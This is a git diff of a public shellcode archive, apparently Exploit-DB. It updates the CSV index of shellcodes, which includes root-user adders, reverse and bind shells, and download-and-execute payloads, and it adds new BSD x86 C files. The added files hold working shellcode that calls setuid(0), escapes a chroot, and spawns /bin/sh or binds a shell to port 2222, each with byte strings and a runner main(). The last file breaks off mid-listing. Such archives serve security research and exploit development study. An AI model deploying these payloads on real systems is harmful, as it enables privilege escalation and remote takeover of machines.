+43642,shellcodes/bsd_x86/43642.c,"BSD/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43643,shellcodes/linux_x86/43643.c,"Linux/x86 - Write to /etc/passwd with uid(0) + gid(0) Shellcode (74 bytes)",2009-01-01,dev0id,shellcode,linux_x86 +43644,shellcodes/bsd_x86/43644.asm,"BSD/x86 - execve(/bin/sh) + seteuid(0) Shellcode (31 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43645,shellcodes/bsd_x86/43645.asm,"BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,dev0id,shellcode,bsd_x86 +43646,shellcodes/linux_x86/43646.c,"Linux/x86 - Bind TCP (3879/TCP) Shell (/bin/sh) Shellcode (113 bytes)",2009-01-01,lamagra,shellcode,linux_x86 +43647,shellcodes/linux_x86/43647.c,"Linux/x86 - Add Root User (w00w00) To /etc/passwd Shellcode (104 bytes)",2009-01-01,Shok,shellcode,linux_x86 +43648,shellcodes/linux_x86/43648.c,"Linux/x86 - Disable Shadowing Shellcode (42 bytes)",2009-07-04,vlan7,shellcode,linux_x86 +43649,shellcodes/linux_x86/43649.c,"Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)",2009-07-04,vlan7,shellcode,linux_x86 +43650,shellcodes/linux_x86/43650.c,"Linux/x86 - exit(0) / exit(1) Shellcode (3/4 bytes)",2009-06-18,TheWorm,shellcode,linux_x86 +43651,shellcodes/linux_x86/43651.c,"Linux/x86 - setuid(0) + execve(/bin/sh_0) Shellcode (25 bytes)",2009-06-23,TheWorm,shellcode,linux_x86 +43652,shellcodes/linux_x86/43652.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh_[/bin/sh_NULL])) Shellcode (25 bytes)",2009-06-23,TheWorm,shellcode,linux_x86 +43653,shellcodes/linux_x86/43653.c,"Linux/x86 - execve(/sbin/shutdown_/sbin/shutdown 0) Shellcode (36 bytes)",2009-07-11,TheWorm,shellcode,linux_x86 +43654,shellcodes/linux_x86/43654.c,"Linux/x86 - execve(/sbin/reboot_/sbin/reboot) Shellcode (28 bytes)",2009-07-11,TheWorm,shellcode,linux_x86 +43655,shellcodes/linux_x86/43655.c,"Linux/x86 - execve(/sbin/halt_/sbin/halt) Shellcode (27 bytes)",2009-07-11,TheWorm,shellcode,linux_x86 +43656,shellcodes/linux_x86/43656.c,"Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (83 bytes)",2009-01-01,storm,shellcode,linux_x86 +43657,shellcodes/linux_x86/43657.c,"Linux/x86 - setuid(0) + execve(_/bin/sh__0_0) Shellcode (28 bytes)",2009-01-01,storm,shellcode,linux_x86 +43658,shellcodes/linux_x86/43658.c,"Linux/x86 - execve(/bin/sh_0_0) Shellcode (21 bytes)",2009-01-01,storm,shellcode,linux_x86 +43660,shellcodes/linux_x86/43660.c,"Linux/x86 - fork() + setreuid(0_ 0) + execve(cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh) Shellcode (126 bytes)",2009-01-01,anonymous,shellcode,linux_x86 +43661,shellcodes/linux_x86/43661.c,"Linux/x86 - Audio (knock knock knock) via /dev/dsp + setreuid(0_0) + execve() Shellcode (566 bytes)",2000-12-20,"Cody Tubbs",shellcode,linux_x86 +43662,shellcodes/linux_x86/43662.c,"Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)",2009-01-01,zillion,shellcode,linux_x86 +43663,shellcodes/linux_x86/43663.c,"Linux/x86 - execve(/sbin/ipchains -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86 +43664,shellcodes/linux_x86/43664.c,"Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes)",2009-01-01,zillion,shellcode,linux_x86 40549,shellcodes/windows_x86-64/40549.c,"Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40560,shellcodes/windows_x86/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,shellcode,windows_x86 40781,shellcodes/windows_x86-64/40781.c,"Windows x64 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 -40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 +40808,shellcodes/linux_x86-64/40808.c,"Linux/x86-64 - execve(/bin/sh) -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",shellcode,linux_x86-64 40821,shellcodes/windows_x86-64/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 40872,shellcodes/linux_x86/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",shellcode,linux_x86 -40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 +40924,shellcodes/linux_x86/40924.c,"Linux/x86 - execve(/bin/bash -c) Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",shellcode,linux_x86 40981,shellcodes/windows_x86-64/40981.c,"Windows x64 - Bind TCP (2493/TCP) Shell + Password (h271508F) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 41072,shellcodes/windows_x86-64/41072.c,"Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes)",2017-01-15,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 41089,shellcodes/linux_x86-64/41089.c,"Linux/x86-64 - mkdir Shellcode (25 bytes)",2017-01-18,"Ajith Kp",shellcode,linux_x86-64 41128,shellcodes/linux_x86-64/41128.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (87 bytes)",2017-01-19,"Ajith Kp",shellcode,linux_x86-64 -41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve /bin/sh Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 +41174,shellcodes/linux_x86-64/41174.nasm,"Linux/x86-64 - execve(/bin/sh) Shellcode (22 bytes)",2017-01-26,"Robert L. Taylor",shellcode,linux_x86-64 41183,shellcodes/linux/41183.c,"Linux - execve(_/bin/sh__ NULL_ 0) Multi/Dual Mode Shellcode (37 bytes)",2017-01-29,odzhancode,shellcode,linux 41220,shellcodes/generator/41220.c,"Linux - Reverse TCP Shell + Multi/Dual Mode Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,shellcode,generator 41282,shellcodes/linux_x86/41282.nasm,"Linux/x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Alphanumeric + Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",shellcode,linux_x86 @@ -634,25 +686,25 @@ id,file,description,date,author,type,platform 41468,shellcodes/linux_x86-64/41468.nasm,"Linux/x86-64 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",shellcode,linux_x86-64 41477,shellcodes/linux_x86-64/41477.c,"Linux/x86-64 - Reverse TCP (192.168.1.45:4444/TCP) Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",shellcode,linux_x86-64 41481,shellcodes/windows_x86/41481.asm,"Windows x86 - Reverse TCP (127.0.0.1:4444/TCP) Shell + Staged + Alphanumeric Shellcode (332 bytes)",2017-03-01,"Snir Levi",shellcode,windows_x86 -41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 -41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 +41498,shellcodes/linux_x86-64/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) + Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 +41503,shellcodes/linux_x86-64/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) + Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",shellcode,linux_x86-64 41509,shellcodes/linux_x86-64/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 -41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 +41510,shellcodes/linux_x86-64/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) + Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",shellcode,linux_x86-64 41581,shellcodes/windows_x86/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",shellcode,windows_x86 43433,shellcodes/linux_x86/43433.c,"Linux/x86 - Reverse TCP (127.1.1.1:8888/TCP) Shell (/bin/sh) + Null-Free Shellcode (67/69 bytes)",2018-01-05,"Nipun Jaswal",shellcode,linux_x86 -43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve /bin/dash Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86 +43476,shellcodes/linux_x86/43476.c,"Linux/x86 - execve(/bin/dash) Shellcode (30 bytes)",2018-01-10,"Hashim Jawad",shellcode,linux_x86 43480,shellcodes/alpha/43480.c,"Alpha - /bin/sh Shellcode (80 bytes)",2009-01-01,"Lamont Granquist",shellcode,alpha 43481,shellcodes/alpha/43481.c,"Alpha - execve() Shellcode (112 bytes)",2009-01-01,anonymous,shellcode,alpha 43482,shellcodes/alpha/43482.c,"Alpha - setuid() Shellcode (156 bytes)",2009-01-01,anonymous,shellcode,alpha 43483,shellcodes/bsd_x86/43483.c,"BSD/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh_) Shellcode (36 bytes)",2009-01-01,"Jihyeog Lim",shellcode,bsd_x86 -43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86 +43489,shellcodes/linux_x86/43489.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (53 bytes)",2018-01-10,"Debashis Pal",shellcode,linux_x86 43497,shellcodes/arm/43497.asm,"Linux/ARM (Raspberry Pi) - Bind TCP (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (112 bytes)",2018-01-11,Azeria,shellcode,arm -43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64 +43502,shellcodes/freebsd_x86-64/43502.txt,"FreeBSD/x86-64 - execve(/bin/sh) Shellcode (28 bytes)",2009-01-01,Gitsnik,shellcode,freebsd_x86-64 43503,shellcodes/freebsd_x86-64/43503.txt,"FreeBSD/x86-64 - Bind TCP Shell (/bin/sh) + Password (R2CBw0cr) Shellcode (127 bytes)",2009-01-11,Gitsnik,shellcode,freebsd_x86-64 43504,shellcodes/freebsd_x86/43504.asm,"FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)",2009-01-01,Tosh,shellcode,freebsd_x86 -43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86 +43505,shellcodes/freebsd_x86/43505.c,"FreeBSD/x86 - /sbin/pfctl -F all Shellcode (47 bytes)",2009-01-01,antrhacks,shellcode,freebsd_x86 43506,shellcodes/freebsd_x86/43506.c,"FreeBSD/x86 - Bind TCP (41254/TCP) Shell (/bin/sh) Shellcode (115 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 -43507,shellcodes/freebsd_x86/43507.c,"FreeBSD - reboot() Shellcode (15 Bytes)",2009-01-01,zillion,shellcode,freebsd_x86 +43507,shellcodes/freebsd_x86/43507.c,"FreeBSD/x86 - reboot() Shellcode (15 bytes)",2009-01-01,zillion,shellcode,freebsd_x86 43508,shellcodes/irix/43508.c,"IRIX - execve(/bin/sh -c) Shellcode (72 bytes)",2009-01-01,anonymous,shellcode,irix 43509,shellcodes/irix/43509.c,"IRIX - execve(/bin/sh) Shellcode (43 bytes)",2009-01-01,anonymous,shellcode,irix 43510,shellcodes/irix/43510.c,"IRIX - Bind TCP Shell (/bin/sh) Shellcode (364 bytes)",2009-01-01,scut/teso,shellcode,irix @@ -676,34 +728,34 @@ id,file,description,date,author,type,platform 43550,shellcodes/linux_x86-64/43550.c,"Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43551,shellcodes/linux_x86-64/43551.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)",2014-10-29,"Osanda Malith Jayathissa",shellcode,linux_x86-64 43552,shellcodes/linux_x86-64/43552.c,"Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 -43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 +43553,shellcodes/linux_x86-64/43553.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (43 bytes)",2018-01-13,0x4ndr3,shellcode,linux_x86-64 43554,shellcodes/linux_x86-64/43554.c,"Linux/x86-64 - sys_access() Egghunter Shellcode (49 bytes)",2009-01-01,Doreth.Z10,shellcode,linux_x86-64 43555,shellcodes/linux_x86-64/43555.c,"Linux/x86-64 - shutdown -h now Shellcode (65 bytes)",2014-06-27,"Osanda Malith Jayathissa",shellcode,linux_x86-64 43556,shellcodes/linux_x86-64/43556.asm,"Linux/x86-64 - shutdown -h now Shellcode (64 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43557,shellcodes/linux_x86-64/43557.asm,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)",2014-09-14,Keyman,shellcode,linux_x86-64 43558,shellcodes/linux_x86-64/43558.asm,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (136 bytes)",2014-09-04,Keyman,shellcode,linux_x86-64 43559,shellcodes/linux_x86-64/43559.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hell) Shellcode (147 bytes)",2014-09-03,Keyman,shellcode,linux_x86-64 -43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 +43561,shellcodes/linux_x86-64/43561.asm,"Linux/x86-64 - Add Root User (shell-storm/leet) + Polymorphic Shellcode (273 bytes)",2014-09-21,Keyman,shellcode,linux_x86-64 41630,shellcodes/linux_x86/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)",2017-03-17,WangYihang,shellcode,linux_x86 41631,shellcodes/linux_x86/41631.c,"Linux/x86 - Bind TCP (Random TCP Port) Shell (/bin/sh) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",shellcode,linux_x86 41635,shellcodes/linux_x86/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 bytes)",2017-03-19,WangYihang,shellcode,linux_x86 42295,shellcodes/linux_x86/42295.c,"Linux/x86 - Reverse TCP (127.1.1.1:11111/TCP) Shell + Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",shellcode,linux_x86 41723,shellcodes/linux_x86/41723.c,"Linux/x86 - Reverse TCP (192.168.3.119:54321/TCP) Shell (/bin/bash) Shellcode (110 bytes)",2017-03-24,JR0ch17,shellcode,linux_x86 -41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 -41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86 +41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64 +41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve(/bin/sh) Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86 41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64 -41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 +41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64 41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86 41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86 41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64 42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows -42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 -42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 -42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 +42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64 +42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86 +42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64 42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86 42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86 42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64 -42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 +42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86 42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64 42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64 @@ -711,6 +763,6 @@ id,file,description,date,author,type,platform 42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm 42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64 -42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 +42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86 42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64 43463,shellcodes/linux/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux diff --git a/shellcodes/windows/15116.cpp b/shellcodes/arm/15116.cpp similarity index 100% rename from shellcodes/windows/15116.cpp rename to shellcodes/arm/15116.cpp diff --git a/shellcodes/linux_x86/13426.c b/shellcodes/bsd_x86/13426.c similarity index 100% rename from shellcodes/linux_x86/13426.c rename to shellcodes/bsd_x86/13426.c diff --git a/shellcodes/linux_x86/13430.c b/shellcodes/bsd_x86/13430.c similarity index 100% rename from shellcodes/linux_x86/13430.c rename to shellcodes/bsd_x86/13430.c diff --git a/shellcodes/linux_x86/13453.c b/shellcodes/bsd_x86/13453.c similarity index 100% rename from shellcodes/linux_x86/13453.c rename to shellcodes/bsd_x86/13453.c diff --git a/shellcodes/bsd_x86/43627.c b/shellcodes/bsd_x86/43627.c new file mode 100644 index 000000000..3134b1c68 --- /dev/null +++ b/shellcodes/bsd_x86/43627.c @@ -0,0 +1,65 @@ +/* The setuid(0)+chroot()+execve shellcode + + it will: + setuid(0) + put '../' 10 times in chroot() + execute /bin/sh + Size 57 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + + +BITS 32 + + xor ecx,ecx + xor eax,eax + push eax + mov al,0x17 + push eax + int 0x80 + push ecx + mov cl,0x1e +main_push: + push byte 0x2e + loop main_push + mov cl,0x1e +main_loop: + dec cl + inc byte [esp+ecx] + dec cl + loop main_loop + push esp + mov al,0x3d + push eax + int 0x80 + + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push esp + push ebx + mov al,0x3b + push eax + int 0x80 +*/ + + + +char shellcode[] = + "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e" + "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0" + "\x3d\x50\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; + + +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43628.c b/shellcodes/bsd_x86/43628.c new file mode 100644 index 000000000..1f0f00b9f --- /dev/null +++ b/shellcodes/bsd_x86/43628.c @@ -0,0 +1,110 @@ +/* The setuid(0)+chroot()+bind shellcode + it will: + setuid(0) + put '../' 10 times in chroot() + open shell on 2222nd port + Size 133 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + +main: + xor ecx,ecx + xor eax,eax + push eax + mov al,0x17 + push eax + int 0x80 + push ecx + mov cl,0x1e +main_push: + push byte 0x2e + loop main_push + mov cl,0x1e +main_loop1: + dec cl + inc byte [esp+ecx] + dec cl + loop main_loop1 + push esp + mov al,0x3d + push eax + int 0x80 + + push byte 0x06 + push byte 0x01 + push byte 0x02 + mov al,0x61 + push eax + int 0x80 + mov edx,eax + xor eax,eax + push eax + push long 0xAE0802ff + mov eax,esp + push byte 0x10 + push eax + push edx + xor eax,eax + mov al,0x68 + push eax + int 0x80 + push byte 0x1 + push edx + xor eax,eax + mov al,0x6a + push eax + int 0x80 + xor eax,eax + push eax + push eax + push edx + mov al,0x1e + push eax + int 0x80 + mov cl,3 + mov ebx,-1 + mov edx,eax +main_loop: + inc ebx + push ebx + push edx + mov al,0x5a + push eax + int 0x80 + dec cl + jnz main_loop + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push esp + push ebx + mov al,0x3b + push eax + int 0x80 + + +*/ + +char shellcode[] = + "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e" + "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0" + "\x3d\x50\xcd\x80\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80" + "\x89\xc2\x31\xc0\x50\x68\xff\x02\x08\xae\x89\xe0\x6a\x10\x50" + "\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a" + "\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03" + "\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80" + "\xfe\xc9\x75\xf4\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43629.c b/shellcodes/bsd_x86/43629.c new file mode 100644 index 000000000..c58ecfb68 --- /dev/null +++ b/shellcodes/bsd_x86/43629.c @@ -0,0 +1,83 @@ +/* The bind shellcode that opens the shell on 2222nd port + Size 100 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + + +BITS 32 + +main: + xor eax,eax + push byte 0x06 + push byte 0x01 + push byte 0x02 + mov al,0x61 + push eax + int 0x80 + mov edx,eax + xor eax,eax + push eax + push long 0xAE0802ff + mov eax,esp + push byte 0x10 + push eax + push edx + xor eax,eax + mov al,0x68 + push eax + int 0x80 + push byte 0x1 + push edx + xor eax,eax + mov al,0x6a + push eax + int 0x80 + xor eax,eax + push eax + push eax + push edx + mov al,0x1e + push eax + int 0x80 + mov cl,3 + mov ebx,-1 + mov edx,eax +main_loop: + inc ebx + push ebx + push edx + mov al,0x5a + push eax + int 0x80 + dec cl + jnz main_loop + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push esp + push ebx + mov al,0x3b + push eax + int 0x80 + +*/ + +char shellcode[] = + "\x31\xc0\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" + "\x31\xc0\x50\x68\xff\x02\x08\xae\x89\xe0\x6a\x10\x50\x52\x31" + "\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd" + "\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff" + "\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc9" + "\x75\xf4\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" + "\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43632.c b/shellcodes/bsd_x86/43632.c new file mode 100644 index 000000000..c636a9db4 --- /dev/null +++ b/shellcodes/bsd_x86/43632.c @@ -0,0 +1,45 @@ +/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes + in the !!world!! + it will put '../' 10 times + Size 34 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + +BITS 32 + + xor ecx,ecx + xor eax,eax + push eax + mov al,0x17 + push eax + int 0x80 + push ecx + mov cl,0x1e +main_push: + push byte 0x2e + loop main_push + mov 